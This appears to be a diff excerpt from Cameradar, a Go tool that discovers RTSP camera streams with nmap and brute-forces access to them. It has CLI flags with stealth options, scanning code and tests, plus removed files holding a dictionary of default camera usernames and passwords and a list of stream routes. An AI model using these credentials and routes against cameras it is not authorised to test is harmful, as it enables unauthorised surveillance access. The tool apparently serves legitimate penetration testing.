if !term.IsTerminal(int(os.Stdin.Fd())) {
|
||||
return false
|
||||
}
|
||||
|
||||
termEnv := strings.TrimSpace(os.Getenv("TERM"))
|
||||
if termEnv == "" || termEnv == "dumb" {
|
||||
return false
|
||||
}
|
||||
|
||||
return true
|
||||
}
|
||||
|
||||
// loadTargets merges targets from command line and file paths.
|
||||
// Valid targets are:
|
||||
// - Single IP addresses (e.g., 192.168.1.10)
|
||||
// - CIDR notations (e.g., 192.168.1.0/24)
|
||||
// - Hostnames (e.g., localhost)
|
||||
// - IP Ranges (e.g., 192.168.1.10-20)
|
||||
func loadTargets(targets []string) ([]string, error) {
|
||||
if len(targets) == 0 {
|
||||
return nil, nil
|
||||
}
|
||||
|
||||
var merged []string
|
||||
for _, target := range targets {
|
||||
trimmed := strings.TrimSpace(target)
|
||||
if trimmed == "" {
|
||||
continue
|
||||
}
|
||||
|
||||
_, err := os.Stat(trimmed)
|
||||
if err != nil {
|
||||
merged = append(merged, trimmed)
|
||||
continue
|
||||
}
|
||||
|
||||
bytes, err := os.ReadFile(trimmed)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("reading targets file %q: %w", trimmed, err)
|
||||
}
|
||||
|
||||
for line := range strings.SplitSeq(string(bytes), "\n") {
|
||||
line = strings.TrimSpace(line)
|
||||
if line == "" {
|
||||
continue
|
||||
}
|
||||
merged = append(merged, line)
|
||||
}
|
||||
}
|
||||
|
||||
return merged, nil
|
||||
}
|
||||
@@ -0,0 +1,164 @@
|
||||
package main
|
||||
|
||||
import (
|
||||
"context"
|
||||
"errors"
|
||||
"fmt"
|
||||
"os"
|
||||
"os/signal"
|
||||
"runtime/debug"
|
||||
"syscall"
|
||||
"time"
|
||||
|
||||
"github.com/ettle/strcase"
|
||||
"github.com/hamba/cmd/v3"
|
||||
"github.com/urfave/cli/v3"
|
||||
)
|
||||
|
||||
const (
|
||||
flagTargets = "targets"
|
||||
flagPorts = "ports"
|
||||
flagCustomRoutes = "custom-routes"
|
||||
flagCustomCredentials = "custom-credentials"
|
||||
flagScanner = "scanner"
|
||||
flagScanSpeed = "scan-speed"
|
||||
flagAttackInterval = "attack-interval"
|
||||
flagTimeout = "timeout"
|
||||
flagSkipScan = "skip-scan"
|
||||
flagDebug = "debug"
|
||||
flagUI = "ui"
|
||||
flagOutput = "output"
|
||||
)
|
||||
|
||||
var (
|
||||
version = "dev"
|
||||
commit = "none"
|
||||
date = "unknown"
|
||||
)
|
||||
|
||||
var flags = cmd.Flags{
|
||||
&cli.StringSliceFlag{
|
||||
Name: flagTargets,
|
||||
Usage: "The targets on which to scan for open RTSP streams in a network range format",
|
||||
Aliases: []string{"t"},
|
||||
Sources: cli.EnvVars(strcase.ToSNAKE(flagTargets)),
|
||||
Required: true,
|
||||
},
|
||||
&cli.StringSliceFlag{
|
||||
Name: flagPorts,
|
||||
Usage: "The ports on which to search for RTSP streams",
|
||||
Aliases: []string{"p"},
|
||||
Sources: cli.EnvVars(strcase.ToSNAKE(flagPorts)),
|
||||
Value: []string{"554", "5554", "8554", "http"},
|
||||
},
|
||||
&cli.StringFlag{
|
||||
Name: flagCustomRoutes,
|
||||
Usage: "The path on which to load a custom routes dictionary",
|
||||
Aliases: []string{"r"},
|
||||
Sources: cli.EnvVars(strcase.ToSNAKE(flagCustomRoutes)),
|
||||
},
|
||||
&cli.StringFlag{
|
||||
Name: flagCustomCredentials,
|
||||
Usage: "The path on which to load a custom credentials JSON dictionary",
|
||||
Aliases: []string{"c"},
|
||||
Sources: cli.EnvVars(strcase.ToSNAKE(flagCustomCredentials)),
|
||||
},
|
||||
&cli.StringFlag{
|
||||
Name: flagScanner,
|
||||
Usage: "Discovery scanner backend: nmap or masscan",
|
||||
Sources: cli.EnvVars(strcase.ToSNAKE(flagScanner)),
|
||||
Value: "nmap",
|
||||
},
|
||||
&cli.Int16Flag{
|
||||
Name: flagScanSpeed,
|
||||
Usage: "The nmap speed preset to use for scanning (lower is stealthier)",
|
||||
Aliases: []string{"s"},
|
||||
Sources: cli.EnvVars(strcase.ToSNAKE(flagScanSpeed)),
|
||||
Value: 4,
|
||||
},
|
||||
&cli.DurationFlag{
|
||||
Name: flagAttackInterval,
|
||||
Usage: "The interval between each attack (i.e: 2000ms, higher is stealthier)",
|
||||
Aliases: []string{"I"},
|
||||
Sources: cli.EnvVars(strcase.ToSNAKE(flagAttackInterval)),
|
||||
Value: 0,
|
||||
},
|
||||
&cli.DurationFlag{
|
||||
Name: flagTimeout,
|
||||
Usage: "The timeout to use for attack attempts (i.e: 2000ms)",
|
||||
Aliases: []string{"T"},
|
||||
Sources: cli.EnvVars(strcase.ToSNAKE(flagTimeout)),
|
||||
Value: 2000 * time.Millisecond,
|
||||
},
|
||||
&cli.BoolFlag{
|
||||
Name: flagSkipScan,
|
||||
Usage: "Skip discovery and treat every target and port as an RTSP stream",
|
||||
Sources: cli.EnvVars(strcase.ToSNAKE(flagSkipScan)),
|
||||
Value: false,
|
||||
},
|
||||
&cli.BoolFlag{
|
||||
Name: flagDebug,
|
||||
Usage: "Enable debug logs",
|
||||
Aliases: []string{"d"},
|
||||
Sources: cli.EnvVars(strcase.ToSNAKE(flagDebug)),
|
||||
Value: false,
|
||||
},
|
||||
&cli.StringFlag{
|
||||
Name: flagUI,
|
||||
Usage: "UI mode: auto, tui, or plain",
|
||||
Sources: cli.EnvVars(strcase.ToSNAKE(flagUI)),
|
||||
Value: "auto",
|
||||
},
|
||||
&cli.StringFlag{
|
||||
Name: flagOutput,
|
||||
Usage: "Write discovered streams to an M3U file at the given path",
|
||||
Sources: cli.EnvVars(strcase.ToSNAKE(flagOutput)),
|
||||
},
|
||||
}
|
||||
|
||||
func main() {
|
||||
os.Exit(realMain())
|
||||
}
|
||||
|
||||
func realMain() (code int) {
|
||||
defer func() {
|
||||
if v := recover(); v != nil {
|
||||
_, _ = fmt.Fprintf(os.Stderr, "Panic: %v\n%s\n", v, debug.Stack())
|
||||
code = 1
|
||||
}
|
||||
}()
|
||||
|
||||
scanCommand := &cli.Command{
|
||||
Name: "scan",
|
||||
Usage: "Scan targets for RTSP streams",
|
||||
Flags: flags,
|
||||
Action: runCameradar,
|
||||
}
|
||||
|
||||
app := &cli.Command{
|
||||
Name: "Cameradar",
|
||||
Version: version,
|
||||
DefaultCommand: scanCommand.Name,
|
||||
Commands: []*cli.Command{
|
||||
scanCommand,
|
||||
{
|
||||
Name: "version",
|
||||
Usage: "Print version information",
|
||||
Action: printVersion,
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
ctx, cancel := signal.NotifyContext(context.Background(), syscall.SIGINT, syscall.SIGTERM)
|
||||
defer cancel()
|
||||
|
||||
err := app.Run(ctx, os.Args)
|
||||
if err != nil {
|
||||
if errors.Is(err, context.Canceled) {
|
||||
return 1
|
||||
}
|
||||
_, _ = fmt.Fprintf(os.Stderr, "Error: %s\n", err.Error())
|
||||
return 1
|
||||
}
|
||||
return 0
|
||||
}
|
||||
@@ -0,0 +1,49 @@
|
||||
package main
|
||||
|
||||
import (
|
||||
"context"
|
||||
"fmt"
|
||||
"os"
|
||||
"os/exec"
|
||||
"strings"
|
||||
|
||||
"github.com/Ullaakut/cameradar/v6/internal/ui"
|
||||
"github.com/urfave/cli/v3"
|
||||
)
|
||||
|
||||
func printVersion(ctx context.Context, _ *cli.Command) error {
|
||||
buildInfo := ui.BuildInfo{Version: version, Commit: commit, Date: date}
|
||||
nmapVersion := getNmapVersion(ctx)
|
||||
_, err := fmt.Fprintf(
|
||||
os.Stdout,
|
||||
"Version:\t%s\nCommit:\t\t%s\nBuild date:\t%s\nNmap:\t\t%s\n",
|
||||
buildInfo.DisplayVersion(),
|
||||
buildInfo.ShortCommit(),
|
||||
buildInfo.Date,
|
||||
nmapVersion,
|
||||
)
|
||||
return err
|
||||
}
|
||||
|
||||
const unknownVersion = "unknown"
|
||||
|
||||
func getNmapVersion(ctx context.Context) string {
|
||||
output, err := exec.CommandContext(ctx, "nmap", "--version").Output()
|
||||
if err != nil {
|
||||
return unknownVersion
|
||||
}
|
||||
|
||||
lines := strings.SplitN(string(output), "\n", 2)
|
||||
firstLine := strings.TrimSpace(lines[0])
|
||||
const prefix = "Nmap version "
|
||||
if !strings.HasPrefix(firstLine, prefix) {
|
||||
return unknownVersion
|
||||
}
|
||||
|
||||
versionPart := strings.TrimSpace(strings.TrimPrefix(firstLine, prefix))
|
||||
fields := strings.Fields(versionPart)
|
||||
if len(fields) == 0 {
|
||||
return unknownVersion
|
||||
}
|
||||
return fields[0]
|
||||
}
|
||||
@@ -1,14 +0,0 @@
|
||||
// Package cmrdr provides methods to be able to discover and
|
||||
// attack RTSP streams easily. RTSP streams are used by most
|
||||
// IP Cameras, often for surveillance.
|
||||
//
|
||||
// A simple example usage of the library can be found in
|
||||
// https://github.com/Ullaakut/cameradar/tree/master/cameradar
|
||||
//
|
||||
// The example usage is complete enough for most users to
|
||||
// ignore the library, but for users with specific needs
|
||||
// such as creating their own bruteforcing dictionary to
|
||||
// access cameras, or running their own network scan, this
|
||||
// library allows to use simple and performant methods to
|
||||
// attack streams.
|
||||
package cmrdr
|
||||
@@ -1,25 +0,0 @@
|
||||
package cmrdr
|
||||
|
||||
import (
|
||||
curl "github.com/andelf/go-curl"
|
||||
)
|
||||
|
||||
// Curler is an interface that implements the CURL interface of the go-curl library
|
||||
// Used for mocking
|
||||
type Curler interface {
|
||||
Setopt(opt int, param interface{}) error
|
||||
Perform() error
|
||||
Getinfo(info curl.CurlInfo) (interface{}, error)
|
||||
Duphandle() Curler
|
||||
}
|
||||
|
||||
// Curl is a libcurl wrapper used to make the Curler interface work even though
|
||||
// golang currently does not support covariance (see https://github.com/golang/go/issues/7512)
|
||||
type Curl struct {
|
||||
*curl.CURL
|
||||
}
|
||||
|
||||
// Duphandle wraps curl.Duphandle
|
||||
func (c *Curl) Duphandle() Curler {
|
||||
return &Curl{c.CURL.Duphandle()}
|
||||
}
|
||||
@@ -1,20 +0,0 @@
|
||||
package cmrdr
|
||||
|
||||
import (
|
||||
"reflect"
|
||||
"testing"
|
||||
|
||||
curl "github.com/andelf/go-curl"
|
||||
)
|
||||
|
||||
func TestCurl(t *testing.T) {
|
||||
handle := Curl{
|
||||
CURL: curl.EasyInit(),
|
||||
}
|
||||
|
||||
handle2 := handle.Duphandle()
|
||||
|
||||
if reflect.DeepEqual(handle, handle2) {
|
||||
t.Errorf("unexpected identical handle from duphandle: expected %+v got %+v", handle, handle2)
|
||||
}
|
||||
}
|
||||
@@ -1,43 +0,0 @@
|
||||
{
|
||||
"usernames": [
|
||||
"",
|
||||
"666666",
|
||||
"888888",
|
||||
"Admin",
|
||||
"admin",
|
||||
"admin1",
|
||||
"administrator",
|
||||
"Administrator",
|
||||
"Dinion",
|
||||
"root",
|
||||
"service",
|
||||
"supervisor",
|
||||
"ubnt"
|
||||
],
|
||||
"passwords" : [
|
||||
"",
|
||||
"111111",
|
||||
"1111111",
|
||||
"1234",
|
||||
"12345",
|
||||
"123456",
|
||||
"4321",
|
||||
"666666",
|
||||
"888888",
|
||||
"9999",
|
||||
"admin",
|
||||
"camera",
|
||||
"fliradmin",
|
||||
"ikwd",
|
||||
"jvc",
|
||||
"meinsm",
|
||||
"pass",
|
||||
"password",
|
||||
"root",
|
||||
"service",
|
||||
"supervisor",
|
||||
"system",
|
||||
"ubnt",
|
||||
"wbox123"
|
||||
]
|
||||
}
|
||||
@@ -1,116 +0,0 @@
|
||||
|
||||
1.AMP
|
||||
1/h264major
|
||||
1/stream1
|
||||
CAM_ID.password.mp2
|
||||
GetData.cgi
|
||||
MediaInput/h264
|
||||
MediaInput/mpeg4
|
||||
VideoInput/1/h264/1
|
||||
access_code
|
||||
access_name_for_stream_1_to_5
|
||||
av0_0
|
||||
av2
|
||||
avn=2
|
||||
axis-media/media.amp
|
||||
cam
|
||||
cam0_0
|
||||
cam0_1
|
||||
cam1/h264
|
||||
cam1/h264/multicast
|
||||
cam1/mjpeg
|
||||
cam1/mpeg4
|
||||
camera.stm
|
||||
ch0
|
||||
ch001.sdp
|
||||
ch01.264
|
||||
ch0_unicast_firststream
|
||||
ch0_unicast_secondstream
|
||||
channel1
|
||||
h264
|
||||
h264/media.amp
|
||||
image.mpg
|
||||
img/media.sav
|
||||
img/video.asf
|
||||
img/video.sav
|
||||
ioImage/1
|
||||
ipcam.sdp
|
||||
ipcam_h264.sdp
|
||||
live.sdp
|
||||
live/h264
|
||||
live/main
|
||||
live/main0
|
||||
live/mpeg4
|
||||
live_mpeg4.sdp
|
||||
livestream
|
||||
livestream/
|
||||
media/media.amp
|
||||
media/video1
|
||||
mjpeg/media.smp
|
||||
mp4
|
||||
mpeg4
|
||||
mpeg4/1/media.amp
|
||||
mpeg4/media.amp
|
||||
mpeg4/media.smp
|
||||
mpeg4unicast
|
||||
mpg4/rtsp.amp
|
||||
multicaststream
|
||||
now.mp4
|
||||
nph-h264.cgi
|
||||
nphMpeg4/g726-640x
|
||||
nphMpeg4/g726-640x480
|
||||
nphMpeg4/nil-320x240
|
||||
play1.sdp
|
||||
play2.sdp
|
||||
rtpvideo1.sdp
|
||||
rtsp_live0
|
||||
rtsp_live1
|
||||
rtsp_live2
|
||||
rtsp_tunnel
|
||||
rtsph264
|
||||
stream1
|
||||
user.pin.mp2
|
||||
user_defined
|
||||
video
|
||||
video.3gp
|
||||
video.mp4
|
||||
video1
|
||||
video1+audio1
|
||||
vis
|
||||
wfov
|
||||
video.h264
|
||||
11
|
||||
12
|
||||
ch1-s1
|
||||
live3.sdp
|
||||
onvif-media/media.amp
|
||||
axis-media/media.amp
|
||||
axis-media/media.amp?videocodec=h264
|
||||
mpeg4/media.amp
|
||||
stream
|
||||
cam/realmonitor
|
||||
live
|
||||
video.pro2
|
||||
videoMain
|
||||
VideoInput/1/mpeg4/1
|
||||
VideoInput/1/h264/1
|
||||
video.pro3
|
||||
video.pro1
|
||||
video.mjpg
|
||||
h264_vga.sdp
|
||||
media.amp
|
||||
media
|
||||
ONVIF/MediaInput
|
||||
nphMpeg4/g726-640x48
|
||||
MediaInput/mpeg4
|
||||
MediaInput/h264
|
||||
Streaming/Channels/1
|
||||
ch0_0.h264
|
||||
rtsph2641080p
|
||||
live/av0
|
||||
cam1/onvif-h264
|
||||
ucast/11
|
||||
LowResolutionVideo
|
||||
1
|
||||
live/ch00_0
|
||||
medias2
|
||||
-64
@@ -1,64 +0,0 @@
|
||||
package cmrdr
|
||||
|
||||
import (
|
||||
"strings"
|
||||
|
||||
"github.com/Ullaakut/nmap"
|
||||
)
|
||||
|
||||
// Discover scans the target networks and tries to find RTSP streams within them.
|
||||
//
|
||||
// targets can be:
|
||||
//
|
||||
// - a subnet (e.g.: 172.16.100.0/24)
|
||||
// - an IP (e.g.: 172.16.100.10)
|
||||
// - a hostname (e.g.: localhost)
|
||||
// - a range of IPs (e.g.: 172.16.100.10-20)
|
||||
//
|
||||
// ports can be:
|
||||
//
|
||||
// - one or multiple ports and port ranges separated by commas (e.g.: 554,8554-8560,18554-28554)
|
||||
func Discover(targets, ports []string, speed int) ([]Stream, error) {
|
||||
// Run nmap command to discover open ports on the specified targets & ports
|
||||
scanner, err := nmap.NewScanner(
|
||||
nmap.WithTargets(targets...),
|
||||
nmap.WithPorts(ports...),
|
||||
nmap.WithTimingTemplate(nmap.Timing(speed)),
|
||||
)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
return scan(scanner)
|
||||
}
|
||||
|
||||
func scan(scanner nmap.ScanRunner) ([]Stream, error) {
|
||||
results, err := scanner.Run()
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
var streams []Stream
|
||||
// Get streams from nmap results
|
||||
for _, host := range results.Hosts {
|
||||
for _, port := range host.Ports {
|
||||
if port.Status() != "open" {
|
||||
continue
|
||||
}
|
||||
|
||||
if !strings.Contains(port.Service.Name, "rtsp") {
|
||||
continue
|
||||
}
|
||||
|
||||
for _, address := range host.Addresses {
|
||||
streams = append(streams, Stream{
|
||||
Device: port.Service.Product,
|
||||
Address: address.Addr,
|
||||
Port: port.ID,
|
||||
})
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
return streams, nil
|
||||
}
|
||||
@@ -1,303 +0,0 @@
|
||||
package cmrdr
|
||||
|
||||
import (
|
||||
"errors"
|
||||
"os"
|
||||
"testing"
|
||||
|
||||
"github.com/Ullaakut/nmap"
|
||||
"github.com/stretchr/testify/assert"
|
||||
"github.com/stretchr/testify/mock"
|
||||
)
|
||||
|
||||
type nmapMock struct {
|
||||
mock.Mock
|
||||
}
|
||||
|
||||
func (m *nmapMock) Run() (*nmap.Run, error) {
|
||||
args := m.Called()
|
||||
|
||||
if args.Get(0) != nil {
|
||||
return args.Get(0).(*nmap.Run), args.Error(1)
|
||||
}
|
||||
return nil, args.Error(1)
|
||||
}
|
||||
|
||||
func TestDiscover(t *testing.T) {
|
||||
tests := []struct {
|
||||
description string
|
||||
|
||||
targets []string
|
||||
ports []string
|
||||
speed int
|
||||
removePath bool
|
||||
|
||||
expectedErr error
|
||||
expectedResult []Stream
|
||||
}{
|
||||
{
|
||||
description: "create new scanner and call scan, no error",
|
||||
|
||||
targets: []string{"localhost"},
|
||||
ports: []string{"80"},
|
||||
speed: 5,
|
||||
},
|
||||
{
|
||||
description: "create new scanner with missing nmap installation",
|
||||
|
||||
removePath: true,
|
||||
ports: []string{"80"},
|
||||
|
||||
expectedErr: errors.New("'nmap' binary was not found"),
|
||||
},
|
||||
}
|
||||
|
||||
for _, test := range tests {
|
||||
t.Run(test.description, func(t *testing.T) {
|
||||
if test.removePath {
|
||||
os.Setenv("PATH", "")
|
||||
}
|
||||
|
||||
result, err := Discover(test.targets, test.ports, test.speed)
|
||||
|
||||
assert.Equal(t, test.expectedErr, err)
|
||||
assert.Equal(t, test.expectedResult, result)
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestScan(t *testing.T) {
|
||||
validStream1 := Stream{
|
||||
Device: "fakeDevice",
|
||||
Address: "fakeAddress",
|
||||
Port: 1337,
|
||||
}
|
||||
|
||||
validStream2 := Stream{
|
||||
Device: "fakeDevice",
|
||||
Address: "differentFakeAddress",
|
||||
Port: 1337,
|
||||
}
|
||||
|
||||
invalidStreamNoPort := Stream{
|
||||
Device: "invalidDevice",
|
||||
Address: "fakeAddress",
|
||||
Port: 0,
|
||||
}
|
||||
|
||||
invalidStreamNoAddress := Stream{
|
||||
Device: "invalidDevice",
|
||||
Address: "",
|
||||
Port: 1337,
|
||||
}
|
||||
|
||||
testCases := []struct {
|
||||
description string
|
||||
nmapResult *nmap.Run
|
||||
nmapError error
|
||||
|
||||
expectedStreams []Stream
|
||||
expectedErr error
|
||||
}{
|
||||
{
|
||||
description: "valid streams",
|
||||
|
||||
nmapResult: &nmap.Run{
|
||||
Hosts: []nmap.Host{
|
||||
{
|
||||
Addresses: []nmap.Address{
|
||||
{
|
||||
Addr: validStream1.Address,
|
||||
},
|
||||
},
|
||||
Ports: []nmap.Port{
|
||||
{
|
||||
State: nmap.State{
|
||||
State: "open",
|
||||
},
|
||||
ID: validStream1.Port,
|
||||
Service: nmap.Service{
|
||||
Name: "rtsp",
|
||||
Product: validStream1.Device,
|
||||
},
|
||||
},
|
||||
},
|
||||
},
|
||||
{
|
||||
Addresses: []nmap.Address{
|
||||
{
|
||||
Addr: validStream2.Address,
|
||||
},
|
||||
},
|
||||
Ports: []nmap.Port{
|
||||
{
|
||||
State: nmap.State{
|
||||
State: "open",
|
||||
},
|
||||
ID: validStream2.Port,
|
||||
Service: nmap.Service{
|
||||
Name: "rtsp-alt",
|
||||
Product: validStream2.Device,
|
||||
},
|
||||
},
|
||||
},
|
||||
},
|
||||
},
|
||||
},
|
||||
|
||||
expectedStreams: []Stream{validStream1, validStream2},
|
||||
},
|
||||
{
|
||||
description: "two invalid targets, no error",
|
||||
|
||||
nmapResult: &nmap.Run{
|
||||
Hosts: []nmap.Host{
|
||||
{
|
||||
Addresses: []nmap.Address{
|
||||
{
|
||||
Addr: invalidStreamNoPort.Address,
|
||||
},
|
||||
},
|
||||
},
|
||||
{
|
||||
Addresses: []nmap.Address{},
|
||||
Ports: []nmap.Port{
|
||||
{
|
||||
State: nmap.State{
|
||||
State: "open",
|
||||
},
|
||||
ID: validStream2.Port,
|
||||
Service: nmap.Service{
|
||||
Name: "rtsp-alt",
|
||||
Product: invalidStreamNoAddress.Device,
|
||||
},
|
||||
},
|
||||
},
|
||||
},
|
||||
},
|
||||
},
|
||||
|
||||
expectedStreams: nil,
|
||||
},
|
||||
{
|
||||
description: "different port states, no error",
|
||||
|
||||
nmapResult: &nmap.Run{
|
||||
Hosts: []nmap.Host{
|
||||
{
|
||||
Addresses: []nmap.Address{
|
||||
{
|
||||
Addr: invalidStreamNoPort.Address,
|
||||
}},
|
||||
Ports: []nmap.Port{
|
||||
{
|
||||
State: nmap.State{
|
||||
State: "closed",
|
||||
},
|
||||
ID: validStream2.Port,
|
||||
Service: nmap.Service{
|
||||
Name: "rtsp-alt",
|
||||
Product: invalidStreamNoAddress.Device,
|
||||
},
|
||||
},
|
||||
},
|
||||
},
|
||||
{
|
||||
Addresses: []nmap.Address{
|
||||
{
|
||||
Addr: invalidStreamNoPort.Address,
|
||||
}},
|
||||
Ports: []nmap.Port{
|
||||
{
|
||||
State: nmap.State{
|
||||
State: "unfiltered",
|
||||
},
|
||||
ID: validStream2.Port,
|
||||
Service: nmap.Service{
|
||||
Name: "rtsp-alt",
|
||||
Product: invalidStreamNoAddress.Device,
|
||||
},
|
||||
},
|
||||
},
|
||||
},
|
||||
{
|
||||
Addresses: []nmap.Address{
|
||||
{
|
||||
Addr: invalidStreamNoPort.Address,
|
||||
}},
|
||||
Ports: []nmap.Port{
|
||||
{
|
||||
State: nmap.State{
|
||||
State: "filtered",
|
||||
},
|
||||
ID: validStream2.Port,
|
||||
Service: nmap.Service{
|
||||
Name: "rtsp-alt",
|
||||
Product: invalidStreamNoAddress.Device,
|
||||
},
|
||||
},
|
||||
},
|
||||
},
|
||||
},
|
||||
},
|
||||
|
||||
expectedStreams: nil,
|
||||
},
|
||||
{
|
||||
description: "not rtsp, no error",
|
||||
|
||||
nmapResult: &nmap.Run{
|
||||
Hosts: []nmap.Host{
|
||||
{
|
||||
Addresses: []nmap.Address{
|
||||
{
|
||||
Addr: invalidStreamNoPort.Address,
|
||||
}},
|
||||
Ports: []nmap.Port{
|
||||
{
|
||||
State: nmap.State{
|
||||
State: "open",
|
||||
},
|
||||
ID: validStream2.Port,
|
||||
Service: nmap.Service{
|
||||
Name: "tcp",
|
||||
Product: invalidStreamNoAddress.Device,
|
||||
},
|
||||
},
|
||||
},
|
||||
},
|
||||
},
|
||||
},
|
||||
|
||||
expectedStreams: nil,
|
||||
},
|
||||
{
|
||||
description: "no hosts found",
|
||||
|
||||
nmapResult: &nmap.Run{},
|
||||
expectedStreams: nil,
|
||||
},
|
||||
{
|
||||
description: "scan failed",
|
||||
|
||||
nmapError: errors.New("scan failed"),
|
||||
expectedErr: errors.New("scan failed"),
|
||||
},
|
||||
}
|
||||
|
||||
for _, test := range testCases {
|
||||
t.Run(test.description, func(t *testing.T) {
|
||||
nmapMock := &nmapMock{}
|
||||
|
||||
nmapMock.On("Run").Return(test.nmapResult, test.nmapError)
|
||||
|
||||
results, err := scan(nmapMock)
|
||||
|
||||
assert.Equal(t, test.expectedErr, err)
|
||||
assert.Equal(t, test.expectedStreams, results, "wrong streams parsed")
|
||||
assert.Equal(t, len(test.expectedStreams), len(results), "wrong streams parsed")
|
||||
|
||||
nmapMock.AssertExpectations(t)
|
||||
})
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,89 @@
|
||||
module github.com/Ullaakut/cameradar/v6
|
||||
|
||||
go 1.25.3
|
||||
|
||||
require (
|
||||
github.com/Ullaakut/masscan v1.0.0
|
||||
github.com/Ullaakut/nmap/v4 v4.0.0
|
||||
github.com/bluenviron/gortsplib/v5 v5.3.0
|
||||
github.com/charmbracelet/bubbles v0.21.0
|
||||
github.com/charmbracelet/bubbletea v1.3.10
|
||||
github.com/charmbracelet/lipgloss v1.1.0
|
||||
github.com/ettle/strcase v0.2.0
|
||||
github.com/hamba/cmd/v3 v3.1.0
|
||||
github.com/stretchr/testify v1.11.1
|
||||
github.com/urfave/cli/v3 v3.4.1
|
||||
golang.org/x/term v0.39.0
|
||||
)
|
||||
|
||||
require (
|
||||
github.com/VictoriaMetrics/metrics v1.40.1 // indirect
|
||||
github.com/aymanbagabas/go-osc52/v2 v2.0.1 // indirect
|
||||
github.com/beorn7/perks v1.0.1 // indirect
|
||||
github.com/bluenviron/mediacommon/v2 v2.7.0 // indirect
|
||||
github.com/cactus/go-statsd-client/v5 v5.1.0 // indirect
|
||||
github.com/cenkalti/backoff/v5 v5.0.3 // indirect
|
||||
github.com/cespare/xxhash/v2 v2.3.0 // indirect
|
||||
github.com/charmbracelet/colorprofile v0.2.3-0.20250311203215-f60798e515dc // indirect
|
||||
github.com/charmbracelet/harmonica v0.2.0 // indirect
|
||||
github.com/charmbracelet/x/ansi v0.10.1 // indirect
|
||||
github.com/charmbracelet/x/cellbuf v0.0.13-0.20250311204145-2c3ea96c31dd // indirect
|
||||
github.com/charmbracelet/x/term v0.2.1 // indirect
|
||||
github.com/davecgh/go-spew v1.1.1 // indirect
|
||||
github.com/erikgeiser/coninput v0.0.0-20211004153227-1c3628e74d0f // indirect
|
||||
github.com/go-logr/logr v1.4.3 // indirect
|
||||
github.com/go-logr/stdr v1.2.2 // indirect
|
||||
github.com/go-stack/stack v1.8.1 // indirect
|
||||
github.com/google/uuid v1.6.0 // indirect
|
||||
github.com/gorilla/websocket v1.5.3 // indirect
|
||||
github.com/grafana/pyroscope-go v1.2.7 // indirect
|
||||
github.com/grafana/pyroscope-go/godeltaprof v0.1.9 // indirect
|
||||
github.com/grpc-ecosystem/grpc-gateway/v2 v2.27.2 // indirect
|
||||
github.com/hamba/logger/v2 v2.9.0 // indirect
|
||||
github.com/hamba/statter/v2 v2.8.0 // indirect
|
||||
github.com/klauspost/compress v1.18.0 // indirect
|
||||
github.com/lucasb-eyer/go-colorful v1.2.0 // indirect
|
||||
github.com/mattn/go-isatty v0.0.20 // indirect
|
||||
github.com/mattn/go-localereader v0.0.1 // indirect
|
||||
github.com/mattn/go-runewidth v0.0.16 // indirect
|
||||
github.com/muesli/ansi v0.0.0-20230316100256-276c6243b2f6 // indirect
|
||||
github.com/muesli/cancelreader v0.2.2 // indirect
|
||||
github.com/muesli/termenv v0.16.0 // indirect
|
||||
github.com/munnerz/goautoneg v0.0.0-20191010083416-a7dc8b61c822 // indirect
|
||||
github.com/openzipkin/zipkin-go v0.4.3 // indirect
|
||||
github.com/pion/logging v0.2.4 // indirect
|
||||
github.com/pion/randutil v0.1.0 // indirect
|
||||
github.com/pion/rtcp v1.2.16 // indirect
|
||||
github.com/pion/rtp v1.10.0 // indirect
|
||||
github.com/pion/sdp/v3 v3.0.17 // indirect
|
||||
github.com/pion/srtp/v3 v3.0.10 // indirect
|
||||
github.com/pion/transport/v4 v4.0.1 // indirect
|
||||
github.com/pmezard/go-difflib v1.0.0 // indirect
|
||||
github.com/prometheus/client_golang v1.23.2 // indirect
|
||||
github.com/prometheus/client_model v0.6.2 // indirect
|
||||
github.com/prometheus/common v0.66.1 // indirect
|
||||
github.com/prometheus/procfs v0.17.0 // indirect
|
||||
github.com/rivo/uniseg v0.4.7 // indirect
|
||||
github.com/valyala/fastrand v1.1.0 // indirect
|
||||
github.com/valyala/histogram v1.2.0 // indirect
|
||||
github.com/xo/terminfo v0.0.0-20220910002029-abceb7e1c41e // indirect
|
||||
go.opentelemetry.io/auto/sdk v1.2.1 // indirect
|
||||
go.opentelemetry.io/otel v1.38.0 // indirect
|
||||
go.opentelemetry.io/otel/exporters/otlp/otlptrace v1.38.0 // indirect
|
||||
go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracegrpc v1.38.0 // indirect
|
||||
go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracehttp v1.38.0 // indirect
|
||||
go.opentelemetry.io/otel/exporters/zipkin v1.38.0 // indirect
|
||||
go.opentelemetry.io/otel/metric v1.38.0 // indirect
|
||||
go.opentelemetry.io/otel/sdk v1.38.0 // indirect
|
||||
go.opentelemetry.io/otel/trace v1.38.0 // indirect
|
||||
go.opentelemetry.io/proto/otlp v1.8.0 // indirect
|
||||
go.yaml.in/yaml/v2 v2.4.2 // indirect
|
||||
golang.org/x/net v0.49.0 // indirect
|
||||
golang.org/x/sys v0.40.0 // indirect
|
||||
golang.org/x/text v0.33.0 // indirect
|
||||
google.golang.org/genproto/googleapis/api v0.0.0-20250908214217-97024824d090 // indirect
|
||||
google.golang.org/genproto/googleapis/rpc v0.0.0-20250908214217-97024824d090 // indirect
|
||||
google.golang.org/grpc v1.75.1 // indirect
|
||||
google.golang.org/protobuf v1.36.9 // indirect
|
||||
gopkg.in/yaml.v3 v3.0.1 // indirect
|
||||
)
|
||||
@@ -0,0 +1,272 @@
|
||||
dario.cat/mergo v1.0.0 h1:AGCNq9Evsj31mOgNPcLyXc+4PNABt905YmuqPYYpBWk=
|
||||
dario.cat/mergo v1.0.0/go.mod h1:uNxQE+84aUszobStD9th8a29P2fMDhsBdgRYvZOxGmk=
|
||||
github.com/Azure/go-ansiterm v0.0.0-20210617225240-d185dfc1b5a1 h1:UQHMgLO+TxOElx5B5HZ4hJQsoJ/PvUvKRhJHDQXO8P8=
|
||||
github.com/Azure/go-ansiterm v0.0.0-20210617225240-d185dfc1b5a1/go.mod h1:xomTg63KZ2rFqZQzSB4Vz2SUXa1BpHTVz9L5PTmPC4E=
|
